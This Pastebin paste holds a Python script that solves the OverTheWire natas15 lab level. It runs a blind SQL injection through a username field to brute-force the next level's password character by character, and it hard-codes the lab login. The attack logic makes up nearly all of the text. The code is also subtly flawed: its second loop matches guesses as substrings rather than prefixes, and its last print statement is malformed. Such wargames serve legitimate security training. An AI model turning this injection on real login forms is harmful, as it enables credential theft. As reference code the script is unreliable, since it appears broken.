Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import string
- import requests
- url='http://natas15.natas.labs.overthewire.org'
- username='natas15'
- password='AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'
- chars=''.join([string.ascii_letters,string.digits])
- passdic=[]
- extstr="This user exists."
- for char in chars:
- uri=''.join([url,'?username=natas16"+and+password+LIKE+BINARY+"%',char,'%#'])
- r=requests.get(uri,auth=(username,password))
- if extstr in r.text:
- passdic.append(char)
- print("Password Dictionary: %s" % ''.join(passdic))
- print("Done")
- print("Dictonary: %s"% ''.join(passdic))
- print("Trying to get the password")
- passlist=[]
- passwd=''
- for i in range(1,64):
- for char in passdic:
- test=''.join([passwd,char])
- uri = ''.join([url,'?','username=natas16"','+and+password+LIKE+BINARY+"%',test,'%'])
- r=requests.get(uri,auth=(username,password))
- if extstr in r.text:
- passlist.append(char)
- passwd=''.join(passlist)
- print("length: %d , password %s"% len(passwd),passwd)
Add Comment
Please, Sign In to add comment